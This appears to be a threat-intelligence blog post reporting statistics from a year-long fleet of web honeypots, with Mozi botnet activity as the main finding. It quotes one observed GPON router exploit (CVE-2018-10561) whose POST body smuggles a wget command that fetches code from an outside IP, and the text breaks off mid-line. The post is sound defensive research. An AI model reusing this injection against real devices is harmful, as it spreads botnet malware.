Skip to main content

Posts

Showing posts from October, 2022

300 Days of New Web Honeypots

During December 2021, we deployed a new fleet of custom web honeypots written in Python Flask. The ongoing detections have been incorporated into our database as of January 3, 2022 and we are also pushing our detection feed to VirusTotal Collections . Approaching one year of of collections, here are some observations and stats: Locations where sensors are deployed: Sydney, AU Madrid, ES Amsterdam, NL Moscow, RU (which was forcibly shutdown due to sanctions imposed as a result of the 2022 Russian invasion of Ukraine) Chicago, US New Jersey, US Iowa, US We observed nearly 500,000 requests from over 38,000 unique IPs. A majority of the malware payloads we have observed are related to the Mozi botnet. You can find the related indicators shared on Abuse.ch ThreatFox here.   An example of this exploit observed in the POST body which targets GPON home routers (CVE-2018-10561) is as follows: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://221.205.75.24...